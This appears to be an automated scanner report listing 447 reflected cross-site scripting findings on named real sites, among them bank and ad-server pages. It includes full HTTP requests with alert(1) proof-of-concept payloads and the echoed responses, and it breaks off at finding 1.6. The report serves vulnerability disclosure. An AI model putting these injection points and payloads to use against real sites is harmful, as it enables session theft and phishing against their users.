1.329. http://servedby.flashtalking.com/imp/3/16303 [ftscw parameter]

1.330. http://servedby.flashtalking.com/imp/3/16303 [ftx parameter]

1.331. http://servedby.flashtalking.com/imp/3/16303 [fty parameter]

1.332. http://servedby.flashtalking.com/imp/3/16303 [name of an arbitrarily supplied request parameter]

1.333. http://widgets.macroaxis.com/widgets/url.jsp [name of an arbitrarily supplied request parameter]

1.334. http://widgets.macroaxis.com/widgets/url.jsp [t parameter]

1.335. http://www-open-opensocial.googleusercontent.com/gadgets/ifr [url parameter]

1.336. http://www-stage.bankofamerica.com/surveys/bridge/surveybridge.cfm [REST URL parameter 1]

1.337. http://www-stage.bankofamerica.com/surveys/bridge/surveybridge.cfm [REST URL parameter 2]

1.338. http://www.addthis.com/favicon.ico [REST URL parameter 1]

1.339. http://www.addthis.com/favicon.ico [REST URL parameter 1]

1.340. http://www.bankofamerica.com/creditcards/index.cfm [REST URL parameter 1]

1.341. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 1]

1.342. http://www.bankofamerica.com/deposits/checksave/index.cfm [REST URL parameter 2]

1.343. http://www.bankofamerica.com/findit/locator.cfm [REST URL parameter 1]

1.344. http://www.bankofamerica.com/help/equalhousing.cfm [REST URL parameter 1]

1.345. http://www.bankofamerica.com/help/equalhousing_popup.cfm [REST URL parameter 1]

1.346. http://www.bankofamerica.com/help/index.cfm [REST URL parameter 1]

1.347. http://www.bankofamerica.com/onlinebanking/enroll.cfm [REST URL parameter 1]

1.348. http://www.bankofamerica.com/onlinebanking/index.cfm [REST URL parameter 1]

1.349. http://www.bankofamerica.com/pap/index.cfm [REST URL parameter 1]

1.350. http://www.bankofamerica.com/promos/jump/ktc/index.cfm [REST URL parameter 1]

1.351. http://www.bankofamerica.com/promos/jump/ktc/index.cfm [REST URL parameter 2]

1.352. http://www.bankofamerica.com/promos/jump/ktc/index.cfm [REST URL parameter 3]

1.353. http://www.bankofamerica.com/promos/jump/ktc_coinjar/index.cfm [REST URL parameter 1]

1.354. http://www.bankofamerica.com/promos/jump/ktc_coinjar/index.cfm [REST URL parameter 2]

1.355. http://www.bankofamerica.com/promos/jump/ktc_coinjar/index.cfm [REST URL parameter 3]

1.356. http://www.bankofamerica.com/small_business/business_financing/index.cfm [REST URL parameter 1]

1.357. http://www.bankofamerica.com/small_business/business_financing/index.cfm [REST URL parameter 2]

1.358. http://www.bankofamerica.com/studentbanking/index.cfm [REST URL parameter 1]

1.359. http://www.bankofamerica.com/surveys/bridge/surveybridge.cfm [REST URL parameter 1]

1.360. http://www.bankofamerica.com/surveys/bridge/surveybridge.cfm [REST URL parameter 2]

1.361. http://www.bankofamerica.com/surveys/popup_visit.cfm [REST URL parameter 1]

1.362. http://www.bankofamerica.com/surveys/survey_popup_invoker.cfm [REST URL parameter 1]

1.363. http://www.bankofamerica.com/surveys/survey_select.cfm [REST URL parameter 1]

1.364. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm [REST URL parameter 1]

1.365. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm [cm_mmc parameter]

1.366. http://www.bankofamerica.com/vehicle_and_personal_loans/index.cfm [cm_mmc parameter]

1.367. http://www.google.com/advanced_search [name of an arbitrarily supplied request parameter]

1.368. http://www.greencrestcapital.com/phpt/phpThumb.php [name of an arbitrarily supplied request parameter]

1.369. http://www.greencrestcapital.com/phpt/phpThumb.php [src parameter]

1.370. http://www.ig.gmodules.com/gadgets/ifr [url parameter]

1.371. http://www.linkedin.com/countserv/count/share [url parameter]

1.372. https://www.merrilledge.com/M/ScriptResource.axd [d parameter]

1.373. http://www.pbig.ml.com/PWA/ScriptResource.axd [d parameter]

1.374. http://www.pbig.ml.com/pwa/pages/find-a-pwa.aspx [name of an arbitrarily supplied request parameter]

1.375. http://www.totalmerrill.com/TotalMerrill/system/FABranchLocator.aspx [fatype parameter]

1.376. http://www.tumri.net/ads/mti/6565 [DFA_AdId parameter]

1.377. http://www.tumri.net/ads/mti/6565 [DFA_BuyId parameter]

1.378. http://www.tumri.net/ads/mti/6565 [DFA_Click_Tracker parameter]

1.379. http://www.tumri.net/ads/mti/6565 [DFA_CreativeId parameter]

1.380. http://www.tumri.net/ads/mti/6565 [DFA_PlacementId parameter]

1.381. http://www.tumri.net/ads/mti/6565 [DFA_SiteId parameter]

1.382. http://www.tumri.net/ads/mti/6565 [sc parameter]

1.383. http://www.tumri.net/ads/mti/6565 [x2_TC_1 parameter]

1.384. http://www.tumri.net/ads/mti/6928 [ATL_AdId parameter]

1.385. http://www.tumri.net/ads/mti/6928 [ATL_CampaignId parameter]

1.386. http://www.tumri.net/ads/mti/6928 [ATL_Click_Tracker parameter]

1.387. http://www.tumri.net/ads/mti/6928 [ATL_PlacementId parameter]

1.388. http://www.tumri.net/ads/mts/6565 [DFA_AdId parameter]

1.389. http://www.tumri.net/ads/mts/6565 [DFA_BuyId parameter]

1.390. http://www.tumri.net/ads/mts/6565 [DFA_CreativeId parameter]

1.391. http://www.tumri.net/ads/mts/6565 [DFA_PlacementId parameter]

1.392. http://www.tumri.net/ads/mts/6565 [DFA_SiteId parameter]

1.393. http://www.tumri.net/ads/mts/6565 [ac parameter]

1.394. http://www.tumri.net/ads/mts/6565 [bw parameter]

1.395. http://www.tumri.net/ads/mts/6565 [city parameter]

1.396. http://www.tumri.net/ads/mts/6565 [ct parameter]

1.397. http://www.tumri.net/ads/mts/6565 [dma parameter]

1.398. http://www.tumri.net/ads/mts/6565 [name of an arbitrarily supplied request parameter]

1.399. http://www.tumri.net/ads/mts/6565 [redirect parameter]

1.400. http://www.tumri.net/ads/mts/6565 [st parameter]

1.401. http://www.tumri.net/ads/mts/6565 [x2_TC_1 parameter]

1.402. http://www.tumri.net/ads/mts/6565 [zp parameter]

1.403. http://api.bizographics.com/v1/profile.json [Referer HTTP header]

1.404. http://core.insightexpressai.com/adServer/adServerESI.aspx [Referer HTTP header]

1.405. http://core.insightexpressai.com/adServer/adServerESI.aspx [Referer HTTP header]

1.406. https://my.scoutanalytics.com/ptmrg/authenticate.aspx [Referer HTTP header]

1.407. http://www.bankofamerica.com/surveys/popup_visit.cfm [Referer HTTP header]

1.408. http://www.bankofamerica.com/surveys/popup_visit.cfm [User-Agent HTTP header]

1.409. http://www.tumri.net/ads/mti/6565 [Referer HTTP header]

1.410. http://www.tumri.net/ads/mti/6928 [Referer HTTP header]

1.411. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_brand=fortune&cnn_money_pagetype=social_sync&cnn_money_position=620x60_mid&cnn_money_rollup=technology&cnn_money_section=social_media&cnn_money_subsection=commenting&params.styles=fs&page.allowcompete=yes&tile=1309224167493&page.allowcompete=yes&domId=61790 [NGUserID cookie]

1.412. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=336x280_quigo&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&qcseg=D&qcseg=T&qcseg=2902&qcseg=291&qcseg=446&qcseg=232&qcseg=250&qcseg=249&qcseg=2900&qcseg=1758&bizo_ind=business_services&bizo_func=it_systems_analysts&bizo_sen=executive&tile=1309224167493&page.allowcompete=yes&domId=528442 [NGUserID cookie]

1.413. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_pagetype=blog&cnn_money_position=628x215_bot&cnn_money_rollup=technology&cnn_money_section=blogs&cnn_money_subsection=quigo&params.styles=fs&page.allowcompete=yes&tile=1309224167493&page.allowcompete=yes&domId=260693 [NGUserID cookie]

1.414. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_bot&params.styles=fs&tile=1309224167493&page.allowcompete=yes&domId=229469 [NGUserID cookie]

1.415. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=1x1_survey&cnn_money_rollup=business_news&params.styles=fs&tile=1309224167493&page.allowcompete=yes&domId=84066 [NGUserID cookie]

1.416. http://ads.cnn.com/html.ng/site=cnn_money&cnn_money_position=314x30_spon&cnn_money_rollup=business_news&cnn_money_section=social_media&cnn_money_subsection=most_popular&params.styles=fs&page.allowcompete=yes&tile=1309224167493&page.allowcompete=yes&domId=383053 [NGUserID cookie]

1.417. http://ar.voicefive.com/bmx3/broker.pli [BMX_3PC cookie]

1.418. http://ar.voicefive.com/bmx3/broker.pli [BMX_BR cookie]

1.419. http://ar.voicefive.com/bmx3/broker.pli [BMX_G cookie]

1.420. http://ar.voicefive.com/bmx3/broker.pli [UID cookie]

1.421. http://ar.voicefive.com/bmx3/broker.pli [ar_p101866669 cookie]

1.422. http://ar.voicefive.com/bmx3/broker.pli [ar_p101945457 cookie]

1.423. http://ar.voicefive.com/bmx3/broker.pli [ar_p101983071 cookie]

1.424. http://ar.voicefive.com/bmx3/broker.pli [ar_p104567837 cookie]

1.425. http://ar.voicefive.com/bmx3/broker.pli [ar_p104939219 cookie]

1.426. http://ar.voicefive.com/bmx3/broker.pli [ar_p20101109 cookie]

1.427. http://ar.voicefive.com/bmx3/broker.pli [ar_p45555483 cookie]

1.428. http://ar.voicefive.com/bmx3/broker.pli [ar_p56282763 cookie]

1.429. http://ar.voicefive.com/bmx3/broker.pli [ar_p81479006 cookie]

1.430. http://ar.voicefive.com/bmx3/broker.pli [ar_p82806590 cookie]

1.431. http://ar.voicefive.com/bmx3/broker.pli [ar_p84552060 cookie]

1.432. http://ar.voicefive.com/bmx3/broker.pli [ar_p85001580 cookie]

1.433. http://ar.voicefive.com/bmx3/broker.pli [ar_p87077372 cookie]

1.434. http://ar.voicefive.com/bmx3/broker.pli [ar_p90452457 cookie]

1.435. http://ar.voicefive.com/bmx3/broker.pli [ar_p91143664 cookie]

1.436. http://ar.voicefive.com/bmx3/broker.pli [ar_p97126803 cookie]

1.437. http://ar.voicefive.com/bmx3/broker.pli [ar_p97174789 cookie]

1.438. http://ar.voicefive.com/bmx3/broker.pli [ar_p97464717 cookie]

1.439. http://ar.voicefive.com/bmx3/broker.pli [ar_p98294060 cookie]

1.440. http://ar.voicefive.com/bmx3/broker.pli [ar_s_p97126803 cookie]

1.441. https://my.scoutanalytics.com/ptmrg/authenticate.aspx [ASP.NET_SessionId cookie]

1.442. https://onlineeast2.bankofamerica.com/cgi-bin/ias/0/E/EnrollEntryPoint [BOA_0020 cookie]

1.443. http://www.bankofamerica.com/cferror.cgi [state cookie]

1.444. http://www.bankofamerica.com/findit/error.cgi [state cookie]

1.445. http://www.bankofamerica.com/surveys/flyout/HM_Arrays.js [state cookie]

1.446. http://www.bankofamerica.com/weblinking/flyout/HM_Arrays.js [state cookie]

1.447. http://www.bankofamerica.com/www/global/mvc_objects/images/1pixel_clear.gif [state cookie]



1. Cross-site scripting (reflected)
There are 447 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous-looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:

In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://a.netmng.com/hic/ [click parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://a.netmng.com
Path:   /hic/

Issue detail

The value of the click request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8baf"><script>alert(1)</script>75e5e999f56 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /hic/?nm_creative=8149&nm_width=300&nm_height=250&nm_publ=210&nm_c=AAABMNPbJXBiPl4xeDk5CVA-G1pxx4vWqvILNg&beacon=oxrtb&url=www.marketbuy54.com&rnd=764280935&click=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLzQ3DIAwG0I_-iShr9GoJMAGn3aE7xBg6SbfsGj30FuXd3wwH4M6bjKoyqA0NlMMIpKaNYmOxkiQ16R6n10TfGedjaN5Ue2HiLpWqLStZLJ0ks8W0rByOcQEeP48r3OfvcYN7vrEDFJiiqnMAAAA%3D%26dst%3Db8baf"><script>alert(1)</script>75e5e999f56&nb&passback&bid_time=20110627212652&nm_vid=csmq4atf04cxa&catid=306359757 HTTP/1.1
Host: a.netmng.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: u=488b3b2b-2198-4f8a-bafb-65af73521f16; evo5_ii=rTeHHM8FxVXlMQtFpDbXwORJ34l%2Fv1YYJAemg0C6NzdfuMmQ7WJ%2F5pF%2FuEjoxoP2hR6hCc9xW5BuJ1voxxjDzHeonAdyaBOQeyplESkXfnYj7LfR14NPm2L%2FC%2F7q13jF; evo5=csmq4atf04cxa%7Cb%2BdNiEvISQT6cyitdFbTxMeRzri7agv%2BuPX495tKoG44%2FxaJb%2BBLR2vGmewSkfT8W9wb4%2BGWmxXBKXzfaguPFwiwUvZJuE237iUkaa2neKTPvHSKU6UdIwOLgG0pJYrBDvZXX6%2FrKXP0pcUwLBH7isq7VBHcvJFp%2BBtr7d7A%2F4G9xdgi4OCt%2BpLt5rlINMXH%2Fj7LVDSi0Ps9t8HmtYH%2BquXnmHK5Oh37TVuyfD%2BM9lKr4zOwzCwJWktPWl4nmVc9l%2FFl3JBYqMyagQjBDMPScscrWDac7xxm2Ka0lDkIY5OP682Y%2F%2BhNTTv93CwvjxxEWVyEOa7MPJhCW9K0B1ZjosU7ZALAsL3La8WlyNAa2wcTnGPhhe8dNNWWPM%2FhD%2B%2FgwS4PzPq%2FppfihRQny12ONimUaIlIQ%2BMYgG4N4iCH646FDZoLNhzIAvOnPmZ7IPYgqwx3Yo%2BMTg9DUH4AFxTkXFXHhBjWQBrq%2BqfMwA6DikYWq5KAsXtxiwOmFOcicbkaHYEC0%2FaXfrGsj%2Bf0uLgL0420yDAO3OLhYeZg0x0HmsDXgRycmVysglnjCWFpMYw9e86ad%2FH4uzKisOa6kWjQzXh4Y9FtwEZmtlsMH7dRRutmbXvbwFqVSwnEl2hAWlQndRmbeN48RCufnt7ycGw2ViLW1DLY2htCOkWX%2FeDvEYmbv1tn8zkyfws7DWnCRpL%2B%2FvgMwoxBRomruUCk%2BOtBBA3PR50YFG8yhstdXYja87kFF67EClPachEP0Fs5XXJy

Response

HTTP/1.1 200 OK
Date: Tue, 28 Jun 2011 01:26:55 GMT
Server: Apache/2.2.9
P3P: policyref="http://a.netmng.com/w3c/p3p.xml", CP="NOI DSP COR DEVa PSAa OUR BUS COM NAV"
Expires: Sun, 26 Jun 2011 01:26:55 GMT
Last-Modified: Sun, 26 Jun 2011 01:26:55 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: evo5_display=edKRlW3O%2F9zyshhrw51bSejgfc3WLZWx6yybTIP3e%2FjyyipDRHMaQV4zGt1Mv%2Bkjf9KxSBL2NuyezYb3J9F7kQ%3D%3D; expires=Thu, 02-Jun-44591 01:26:55 GMT; path=/; domain=.netmng.com
Content-Length: 1634
Connection: close
Content-Type: text/html; charset=UTF-8

<IFRAME SRC="http://ad.doubleclick.net/adi/N1558.NetMining/B5527925.2;sz=300x250;click=;ord=1309224415;click=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLzQ3DIAwG0I_-iShr9GoJMAGn3aE7xBg6SbfsGj30FuXd3
...[SNIP]...
k=http://bid.openx.net/click?cd=H4sIAAAAAAAAABXLzQ3DIAwG0I_-iShr9GoJMAGn3aE7xBg6SbfsGj30FuXd3wwH4M6bjKoyqA0NlMMIpKaNYmOxkiQ16R6n10TfGedjaN5Ue2HiLpWqLStZLJ0ks8W0rByOcQEeP48r3OfvcYN7vrEDFJiiqnMAAAA=&dst=b8baf"><script>alert(1)</script>75e5e999f56;?">
...[SNIP]...

1.2. http://ad-emea.doubleclick.net/adi/N6344.150290.INVITE.COM/B5445429.7 [key parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N6344.150290.INVITE.COM/B5445429.7

Issue detail

The value of the key request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bdac"-alert(1)-"77392b856f was submitted in the key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6344.150290.INVITE.COM/B5445429.7;sz=300x250;click=http://va.px.invitemedia.com/pixel?returnType=redirect&key=Click6bdac"-alert(1)-"77392b856f&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0O_4U9CtQWsUx3ESF6xASZ9cTH0bMgbrIPH6t2IBcBszVdfNScwKZRalkVzJOb6t82wbx4DD83p_rTj-R-5jeBESb5XqVKPJxallmZzUJDYPOAH1EXDG8u0BF2D_4Afd2YvCcwAAAA%3D%3D%26dst%3D;ord=1309224534? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7397
Date: Tue, 28 Jun 2011 01:29:37 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
.doubleclick.net/click%3Bh%3Dv8/3b34/f/1bc/%2a/t%3B240188907%3B0-0%3B0%3B63005625%3B4307-300/250%3B41751683/41769470/2%3B%3B%7Esscs%3D%3fhttp://va.px.invitemedia.com/pixel?returnType=redirect&key=Click6bdac"-alert(1)-"77392b856f&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0
...[SNIP]...

1.3. http://ad-emea.doubleclick.net/adi/N6344.150290.INVITE.COM/B5445429.7 [message parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N6344.150290.INVITE.COM/B5445429.7

Issue detail

The value of the message request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ae2e9"-alert(1)-"dc78b75f8dd was submitted in the message parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6344.150290.INVITE.COM/B5445429.7;sz=300x250;click=http://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--ae2e9"-alert(1)-"dc78b75f8dd&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0O_4U9CtQWsUx3ESF6xASZ9cTH0bMgbrIPH6t2IBcBszVdfNScwKZRalkVzJOb6t82wbx4DD83p_rTj-R-5jeBESb5XqVKPJxallmZzUJDYPOAH1EXDG8u0BF2D_4Afd2YvCcwAAAA%3D%3D%26dst%3D;ord=1309224534? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7401
Date: Tue, 28 Jun 2011 01:29:48 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
%3B%7Esscs%3D%3fhttp://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--ae2e9"-alert(1)-"dc78b75f8dd&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0O_4U9CtQWsUx3ESF6xASZ9cTH0bMgbrIPH6t2IBcBszVdfNScwKZRalkVzJOb6t82wbx4DD83p_rTj-R-5jeBESb5XqVKPJxallmZzUJDYPOAH1EXDG8u0BF2
...[SNIP]...

1.4. http://ad-emea.doubleclick.net/adi/N6344.150290.INVITE.COM/B5445429.7 [redirectURL parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N6344.150290.INVITE.COM/B5445429.7

Issue detail

The value of the redirectURL request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b5275"-alert(1)-"ac334d801d8 was submitted in the redirectURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6344.150290.INVITE.COM/B5445429.7;sz=300x250;click=http://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=b5275"-alert(1)-"ac334d801d8 HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 6515
Cache-Control: no-cache
Pragma: no-cache
Date: Tue, 28 Jun 2011 01:29:50 GMT
Expires: Tue, 28 Jun 2011 01:29:50 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
%3fhttp://va.px.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=b5275"-alert(1)-"ac334d801d8http://disneyland.disney.go.com/vacation-packages/spend-one-more-day/?CMP=BAC-DLRUSENFY11Q3DLRCTI0068");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var d
...[SNIP]...

1.5. http://ad-emea.doubleclick.net/adi/N6344.150290.INVITE.COM/B5445429.7 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad-emea.doubleclick.net
Path:   /adi/N6344.150290.INVITE.COM/B5445429.7

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 17d63"-alert(1)-"0029028972a was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N6344.150290.INVITE.COM/B5445429.7;sz=300x250;click=http://va.px.invitemedia.com/pixel?returnType=redirect17d63"-alert(1)-"0029028972a&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3LvQ0CMQwG0O_4U9CtQWsUx3ESF6xASZ9cTH0bMgbrIPH6t2IBcBszVdfNScwKZRalkVzJOb6t82wbx4DD83p_rTj-R-5jeBESb5XqVKPJxallmZzUJDYPOAH1EXDG8u0BF2D_4Afd2YvCcwAAAA%3D%3D%26dst%3D;ord=1309224534? HTTP/1.1
Host: ad-emea.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Content-Length: 7425
Date: Tue, 28 Jun 2011 01:29:26 GMT

<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><!-- Copyright 2008 DoubleClick, a division of Google Inc. All
...[SNIP]...
://ad-emea.doubleclick.net/click%3Bh%3Dv8/3b34/f/1bd/%2a/w%3B240188907%3B1-0%3B0%3B63005625%3B4307-300/250%3B42010411/42028198/1%3B%3B%7Esscs%3D%3fhttp://va.px.invitemedia.com/pixel?returnType=redirect17d63"-alert(1)-"0029028972a&key=Click&message=eJwtjDkOgEAMA7.CUlPkzi5vWtFRIf6Og6jGIzu5yYyOTTjMY9_IFJausyZMIKQRHMOnuAA1Uop62V2F8md9pmD8dPC81kLM_p_KYs8LgAYVNw--&redirectURL=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAAB3
...[SNIP]...

1.6. http://ad.doubleclick.net/adi/N3867.270604.B3/B5387288.6 [mt_adid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
